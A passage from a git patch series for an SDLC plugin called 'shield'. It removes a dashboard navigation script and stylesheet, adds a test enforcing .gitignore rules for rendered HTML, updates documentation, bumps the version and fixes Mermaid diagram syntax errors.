"trd"], - ["plan_md", "Plan", "outputs/plan.html", "plan"], - ["plan_arch_md", "Architecture", "outputs/plan-architecture.html", "arch"], - ["plan_json", "Sidecar JSON", "plan.json", "json"], - ]; - - function titleize(file) { - return file.replace(/\.html$/, "").replace(/[-_]/g, " ") - .replace(/\b\w/g, function (c) { return c.toUpperCase(); }); - } - - // Breadcrumb model from a URL path + the page's root prefix. - // Returns [{label, href|null, active}]. - function crumbModel(pathname, root) { - var parts = decodeURIComponent(pathname).split("/").filter(Boolean); - var file = parts[parts.length - 1] || "index.html"; - var oi = parts.lastIndexOf("outputs"); - if (file === "index.html" || oi <= 0) { - return [{ label: "Dashboard", href: null, active: true }]; - } - var crumb = [{ label: "Dashboard", href: root + "index.html", active: false }]; - crumb.push({ label: parts[oi - 1], href: null, active: false }); - var ri = parts.lastIndexOf("reviews"); - if (ri !== -1 && ri > oi) { - crumb.push({ label: (parts[ri + 1] || "") + " review · " + (parts[ri + 2] || ""), href: null, active: true }); - } else { - crumb.push({ label: FILE_LABELS[file] || titleize(file), href: null, active: true }); - } - return crumb; - } - - // Filtered, grouped feature model from the manifest + a search query. - // Returns [{name, docs:[{label,href,tag}], reviews:[{label,href}]}]. - function filterFeatures(manifest, query, root) { - var features = (manifest && manifest.features) || []; - var q = (query || "").trim().toLowerCase(); - var out = []; - features.forEach(function (f) { - var fm = f.name.toLowerCase().indexOf(q) !== -1; - var docs = []; - ARTIFACTS.forEach(function (a) { - if (f.artifacts && f.artifacts[a[0]] && (!q || fm || a[1].toLowerCase().indexOf(q) !== -1)) { - docs.push({ label: a[1], href: root + f.name + "/" + a[2], tag: a[3] }); - } - }); - var reviews = []; - ["prd", "plan", "code"].forEach(function (rt) { - var rv = f.reviews && f.reviews[rt]; - if (rv && rv.entries) { - rv.entries.forEach(function (en) { - var label = rt + " review · " + en.date; - if (!q || fm || label.toLowerCase().indexOf(q) !== -1) { - reviews.push({ label: label, href: root + en.path }); - } - }); - } - }); - if (docs.length || reviews.length) out.push({ name: f.name, docs: docs, reviews: reviews }); - }); - return out; - } - - // Export pure logic for unit tests (Node). Browsers load this as a classic - // script where `module` is undefined, so this branch is a no-op there. - if (typeof module !== "undefined" && module.exports) { - module.exports = { crumbModel: crumbModel, filterFeatures: filterFeatures, titleize: titleize }; - } - - // Below here is browser-only DOM wiring. - if (typeof document === "undefined") return; - - function el(tag, cls, html) { - var e = document.createElement(tag); - if (cls) e.className = cls; - if (html != null) e.innerHTML = html; - return e; - } - - function renderCrumb(model) { - var crumb = document.getElementById("shield-crumb"); - if (!crumb) return; - crumb.innerHTML = ""; - model.forEach(function (seg, i) { - if (i) crumb.appendChild(el("span", "chev", "›")); - if (seg.href) { - var a = el("a", seg.active ? "here" : null, seg.label); - a.setAttribute("href", seg.href); - crumb.appendChild(a); - } else { - crumb.appendChild(el("span", seg.active ? "here" : null, seg.label)); - } - }); - } - - function renderResults(model, container) { - container.innerHTML = ""; - if (!model.length) { container.appendChild(el("div", "docs-empty", "No docs match")); return; } - model.forEach(function (f) { - container.appendChild(el("div", "feat-name", f.name)); - f.docs.forEach(function (d) { - var a = el("a", "doc", d.label + '' + d.tag + ""); - a.setAttribute("href", d.href); - container.appendChild(a); - }); - f.reviews.forEach(function (r) { - var a = el("a", "doc rev", "↳ " + r.label); - a.setAttribute("href", r.href); - container.appendChild(a); - }); - }); - } - - document.addEventListener("DOMContentLoaded", function () { - var root = document.body.dataset.shieldRoot || ""; - renderCrumb(crumbModel(location.pathname, root)); - - var btn = document.getElementById("docs-toggle"); - var panel = document.getElementById("docs-panel"); - var search = document.getElementById("docs-search"); - var results = document.getElementById("docs-results"); - if (!btn || !panel || !search || !results) return; - - function paint() { renderResults(filterFeatures(window.SHIELD_MANIFEST, search.value, root), results); } - function open() { - panel.classList.add("open"); btn.setAttribute("aria-expanded", "true"); - search.value = ""; paint(); search.focus(); - } - function close() { panel.classList.remove("open"); btn.setAttribute("aria-expanded", "false"); } - - btn.addEventListener("click", function (e) { - e.stopPropagation(); - panel.classList.contains("open") ? close() : open(); - }); - search.addEventListener("input", paint); - search.addEventListener("click", function (e) { e.stopPropagation(); }); - document.addEventListener("keydown", function (e) { - if (e.key === "Escape") close(); - if ((e.metaKey || e.ctrlKey) && e.key.toLowerCase() === "k") { e.preventDefault(); open(); } - }); - document.addEventListener("click", function (e) { - if (!e.target.closest(".feat-wrap")) close(); - }); - }); -})(); diff --git a/docs/shield/shield.css b/docs/shield/shield.css deleted file mode 100644 index 6ea3b4bf..00000000 --- a/docs/shield/shield.css +++ /dev/null @@ -1,81 +0,0 @@ -:root { - --accent:#1a73e8; --bg:#ffffff; --panel:#f7f9fc; --text:#1f1f1f; - --muted:#5a6370; --border:#e4e8ee; --green:#3fb950; --green-bg:#e9f7ee; -} -* { box-sizing:border-box; } -body { margin:0; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",system-ui,sans-serif; - line-height:1.6; color:var(--text); background:var(--bg); } -/* Header — breadcrumb + Features panel */ -.shield-header { display:flex; align-items:center; gap:12px; padding:10px 18px; - border-bottom:1px solid var(--border); background:#fff; position:sticky; top:0; z-index:50; font-size:.92rem; } -.shield-header .brand { font-weight:700; color:var(--text); text-decoration:none; white-space:nowrap; } -.shield-header .bar-sep { color:#9aa3af; } -.crumb { color:var(--muted); white-space:nowrap; overflow:hidden; text-overflow:ellipsis; } -.crumb a { color:var(--muted); text-decoration:none; } -.crumb a:hover { color:var(--accent); } -.crumb .chev { color:#c2c8d0; margin:0 5px; } -.crumb .here { color:var(--accent); font-weight:600; } -.bar-spacer { flex:1; } -.feat-wrap { position:relative; } -.feat-btn { cursor:pointer; border:1px solid var(--border); background:var(--panel); - color:var(--accent); border-radius:6px; padding:5px 12px; font-size:.92rem; white-space:nowrap; } -.feat-btn:hover { border-color:var(--accent); } -.feat-panel { display:none; position:absolute; right:0; top:115%; width:330px; background:#fff; - border:1px solid var(--border); border-radius:10px; box-shadow:0 10px 30px rgba(0,0,0,.12); - padding:10px; max-height:74vh; overflow:auto; } -.feat-panel.open { display:block; } -.docs-search { width:100%; border:1px solid var(--border); border-radius:7px; padding:8px 10px; - font-size:.85rem; outline:none; } -.docs-search:focus { border-color:var(--accent); } -.feat-name { font-weight:600; font-size:.82rem; margin:10px 4px 2px; color:var(--text); } -.doc { display:flex; align-items:center; gap:8px; padding:5px 8px 5px 14px; border-radius:6px; - color:var(--accent); text-decoration:none; font-size:.85rem; } -.doc:hover { background:var(--panel); } -.doc .tag { margin-left:auto; font-size:.62rem; color:var(--muted); background:var(--panel); - border:1px solid var(--border); border-radius:10px; padding:0 6px; text-transform:uppercase; } -.doc.rev { color:var(--muted); padding-left:22px; } -.docs-empty { color:var(--muted); font-size:.8rem; padding:8px 6px; } -/* Main content */ -.shield-main { max-width:960px; margin:0 auto; padding:36px 28px 96px; } -h1,h2,h3,h4 { color:var(--accent); line-height:1.25; } -h1 { font-size:2rem; border-bottom:2px solid var(--accent); padding-bottom:8px; margin-bottom:24px; } -h2 { font-size:1.45rem; margin-top:40px; padding-top:12px; border-top:1px solid var(--border); } -h3 { font-size:1.15rem; margin-top:28px; } -h4 { font-size:1rem; color:var(--text); margin-top:20px; } -p,ul,ol { margin:12px 0; } li { margin:4px 0; } -table { border-collapse:collapse; width:100%; margin:16px 0; font-size:.94rem; } -th,td { padding:8px 12px; border:1px solid var(--border); text-align:left; vertical-align:top; } -th { background:var(--panel); font-weight:600; } -tr:nth-child(even) td { background:#fbfcfd; } -blockquote { border-left:3px solid var(--accent); margin:16px 0; padding:4px 16px; - color:var(--muted); background:var(--panel); } -code { background:#f1f3f6; padding:2px 6px; border-radius:3px; - font-family:"JetBrains Mono","SF Mono",Consolas,monospace; font-size:.9em; } -pre { background:var(--panel); padding:12px 16px; border-radius:6px; overflow-x:auto; - border:1px solid var(--border); } -pre.mermaid { background:transparent; border:none; padding:0; text-align:center; } -a { color:var(--accent); } -hr { border:none; border-top:1px solid var(--border); margin:32px 0; } -.toc,.meta-banner { background:var(--panel); border:1px solid var(--border); - border-left:3px solid var(--accent); border-radius:6px; padding:16px 20px; margin-bottom:28px; font-size:.94rem; } -.toc-title { font-weight:600; margin-bottom:6px; } -.shield-footer { max-width:960px; margin:0 auto; padding:24px 28px; color:var(--muted); - font-size:.85rem; border-top:1px solid var(--border); } -/* Dashboard */ -.dash-grid { display:grid; grid-template-columns:repeat(auto-fill,minmax(280px,1fr)); gap:16px; } -.dash-card { border:1px solid var(--border); border-radius:8px; padding:16px; background:#fff; } -.dash-card h3 { margin:0 0 4px; color:var(--text); font-size:1.05rem; } -.dash-card .date { color:var(--muted); font-size:.8rem; } -.dash-links { display:flex; flex-wrap:wrap; gap:8px; margin-top:10px; } -.dash-links a { font-size:.85rem; border:1px solid var(--border); border-radius:6px; - padding:3px 9px; text-decoration:none; } -.pipeline { display:flex; gap:4px; margin-top:10px; font-size:.72rem; } -.pipe-step { border-radius:8px; padding:1px 7px; background:#f1f3f6; color:var(--muted); } -.pipe-step.done { background:var(--green-bg); color:var(--green); } -.badge { display:inline-block; background:var(--green-bg); color:var(--green); - border-radius:12px; padding:.1em .6em; font-size:.75rem; font-weight:600; } -.dash-empty { color:var(--muted); padding:40px; text-align:center; } -/* Plan story components */ -.story { border:1px solid var(--border); border-radius:8px; padding:20px; margin:25px 0; } -.epic-meta { background:var(--panel); border:1px solid var(--border); border-radius:8px; padding:15px 20px; margin:20px 0; } -.milestone { margin:16px 0; padding:12px 16px; border-left:3px solid var(--accent); background:var(--panel); } diff --git a/shield/scripts/test_gitignore_html_artifacts.py b/shield/scripts/test_gitignore_html_artifacts.py new file mode 100644 index 00000000..dc96b716 --- /dev/null +++ b/shield/scripts/test_gitignore_html_artifacts.py @@ -0,0 +1,29 @@ +"""Eval: .gitignore demotes Shield HTML to a build artifact.""" +from __future__ import annotations + +import subprocess +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[2] # repo root +GITIGNORE = ROOT / ".gitignore" + +REQUIRED_PATTERNS = [ + "**/docs/shield/*/outputs/", + "**/docs/shield/index.html", + "**/docs/shield/manifest.js", +] + + +def test_gitignore_has_html_artifact_rules(): + text = GITIGNORE.read_text() + for pat in REQUIRED_PATTERNS: + assert pat in text, f".gitignore missing rule: {pat}" + + +def test_no_shield_html_tracked(): + out = subprocess.run( + ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"], + cwd=ROOT, capture_output=True, text=True, + ) + tracked = [l for l in out.stdout.splitlines() if l.strip()] + assert tracked == [], f"HTML/assets still tracked: {tracked}" From 2285ea99249d7215dcdcc83785f76503216cc07f Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:28:18 +0000 Subject: [PATCH 07/10] docs(shield): describe HTML output as a gitignored build artifact Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/docs/artifacts.md | 4 ++-- shield/hooks/scripts/session-start.sh | 2 +- shield/schema/output-paths.yaml | 3 +++ shield/skills/general/manifest-schema.md | 2 +- 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/shield/docs/artifacts.md b/shield/docs/artifacts.md index 04fe2f4b..b00c5927 100644 --- a/shield/docs/artifacts.md +++ b/shield/docs/artifacts.md @@ -19,7 +19,7 @@ Top-level dashboard. Renders `manifest.json` as a card grid linking to every fea ## Per-feature (one per feature folder) -Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML sits alongside under `outputs/`. +Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML lands under `outputs/` (build artifact — gitignored; rebuild locally with `/shield render`). ### `research.md` @@ -71,7 +71,7 @@ Markdown rendering of `plan.json` for human readers. Generated alongside `plan.j ### `outputs/{prd,plan,trd}.html` -Rendered HTML siblings of the source markdown. Regenerated on every write of the corresponding source file. +Rendered HTML siblings of the source markdown — local build artifact, gitignored. Rebuild with `/shield render` (regenerates the whole site). ## Reviews diff --git a/shield/hooks/scripts/session-start.sh b/shield/hooks/scripts/session-start.sh index 20f4ace3..ee35c847 100755 --- a/shield/hooks/scripts/session-start.sh +++ b/shield/hooks/scripts/session-start.sh @@ -132,7 +132,7 @@ ${PM_MCP_WARNING:+ ${INCOMPLETE_STEPS_WARNING:+ ⚠ ${INCOMPLETE_STEPS_WARNING}} -**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\`. Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.) +**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\` (build artifact — gitignored; rebuild locally with \`/shield render\`). Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.) **Skill domains:** ${DOMAIN_SKILLS} ${DOMAIN_SKIP:+**Skip skills from:** ${DOMAIN_SKIP} (not relevant to this project)} diff --git a/shield/schema/output-paths.yaml b/shield/schema/output-paths.yaml index ffb425fa..2c30da30 100644 --- a/shield/schema/output-paths.yaml +++ b/shield/schema/output-paths.yaml @@ -1,3 +1,6 @@ +# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and +# regenerated on demand by /shield render (scripts/render-output.sh). The +# committed source of truth is the corresponding Markdown (+ JSON sidecars). # shield/schema/output-paths.yaml # Plugin-owned contract. Consumers should NOT edit. # See docs/superpowers/specs/2026-05-22-shield-output-structure-design.md §5. diff --git a/shield/skills/general/manifest-schema.md b/shield/skills/general/manifest-schema.md index db944292..4d7a4411 100644 --- a/shield/skills/general/manifest-schema.md +++ b/shield/skills/general/manifest-schema.md @@ -63,7 +63,7 @@ Lives at `{output_dir}/manifest.json`. This is the source of truth for which fea - `plan_json` → `{plan_json}` = `{feature_dir}/plan.json` - `plan_md` → `{plan_md}` = `{feature_dir}/plan.md` - `plan_arch_md` → `{plan_arch_md}` = `{feature_dir}/plan-architecture.md` - Each is `true` if the file exists, `false` if not. Rendered HTML siblings under `{feature_dir}/outputs/` are implied by the source presence and not tracked separately. + Each is `true` if the file exists, `false` if not. Rendered HTML siblings land under `{feature_dir}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`) and are implied by the source presence, not tracked separately. - **`features[].reviews`** — one entry per review type (`prd`, `plan`, `code`). Each: - `latest`: the highest-sorted date-keyed run folder name (e.g. `2026-03-21_2`) - `count`: number of run folders under `{feature_dir}/reviews//` From 67355e3c3cb8d4bed0fac34e201049cf269b54ce Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:28:47 +0000 Subject: [PATCH 08/10] =?UTF-8?q?chore(shield):=20bump=20to=202.28.0=20?= =?UTF-8?q?=E2=80=94=20Markdown-canonical=20output=20+=20/shield=20render?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.7 (1M context) --- .claude-plugin/marketplace.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json index e17b31a8..9b52973a 100644 --- a/.claude-plugin/marketplace.json +++ b/.claude-plugin/marketplace.json @@ -9,7 +9,7 @@ { "name": "shield", "description": "Unified SDLC plugin \u2014 research, planning, PM integration, implementation, and continuous review with multi-domain support and specialist agents", - "version": "2.27.0", + "version": "2.28.0", "source": "./shield", "category": "development" }, From 521f21307489aa4dbf88eda417b0ce91113d2a00 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 18:02:33 +0530 Subject: [PATCH 09/10] fix(shield): mermaid sequence syntax error in backlog-store LLD Parentheses in a sequenceDiagram participant alias ("caller (/backlog add or skill)") break Mermaid's parser ("Syntax error in text"). Rephrase the alias without parens. Fixed in both the canonical docs/lld/ copy and the docs/shield/ draft. Co-Authored-By: Claude Opus 4.8 (1M context) --- docs/lld/backlog-store.md | 2 +- docs/shield/backlog-20260527/lld-backlog-store.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md index 4e0d01fa..34a74ee7 100644 --- a/docs/lld/backlog-store.md +++ b/docs/lld/backlog-store.md @@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls. ```mermaid sequenceDiagram - participant C as caller (/backlog add or skill) + participant C as caller via /backlog add or skill participant S as backlog_store participant FS as filesystem C->>S: capture(text, ..., source) diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md index 4c74de09..4c5e8660 100644 --- a/docs/shield/backlog-20260527/lld-backlog-store.md +++ b/docs/shield/backlog-20260527/lld-backlog-store.md @@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls. ```mermaid sequenceDiagram - participant C as caller (/backlog add or skill) + participant C as caller via /backlog add or skill participant S as backlog_store participant FS as filesystem C->>S: capture(text, ..., source) From b0d8dd3b00417a23d7fc471e9aa7cf9223d08450 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 18:14:40 +0530 Subject: [PATCH 10/10] =?UTF-8?q?fix(shield):=20real=20mermaid=20parse=20e?= =?UTF-8?q?rror=20=E2=80=94=20semicolon=20in=20sequence=20message?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit GitHub's parser pinned the error to diagram line 10: the ';' in "append entry (...); validate in-memory doc" is treated as a statement separator, so Mermaid tries to parse "validate in-memory doc" as a new statement and fails expecting an arrow. Replace ';' with 'then'. (The earlier alias-parens change was not the cause.) Co-Authored-By: Claude Opus 4.8 (1M context) --- docs/lld/backlog-store.md | 2 +- docs/shield/backlog-20260527/lld-backlog-store.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md index 34a74ee7..535b49d3 100644 --- a/docs/lld/backlog-store.md +++ b/docs/lld/backlog-store.md @@ -111,7 +111,7 @@ sequenceDiagram alt malformed S-->>C: raise BacklogInvalid else ok - S->>S: append entry (uuid4 id, next order); validate in-memory doc + S->>S: append entry (uuid4 id, next order) then validate in-memory doc S->>FS: write backlog.json.tmp (full doc) + fsync S->>FS: re-check on-disk version/count (compare-before-replace) alt store changed underneath diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md index 4c5e8660..0f7b40eb 100644 --- a/docs/shield/backlog-20260527/lld-backlog-store.md +++ b/docs/shield/backlog-20260527/lld-backlog-store.md @@ -111,7 +111,7 @@ sequenceDiagram alt malformed S-->>C: raise BacklogInvalid else ok - S->>S: append entry (uuid4 id, next order); validate in-memory doc + S->>S: append entry (uuid4 id, next order) then validate in-memory doc S->>FS: write backlog.json.tmp (full doc) + fsync S->>FS: re-check on-disk version/count (compare-before-replace) alt store changed underneath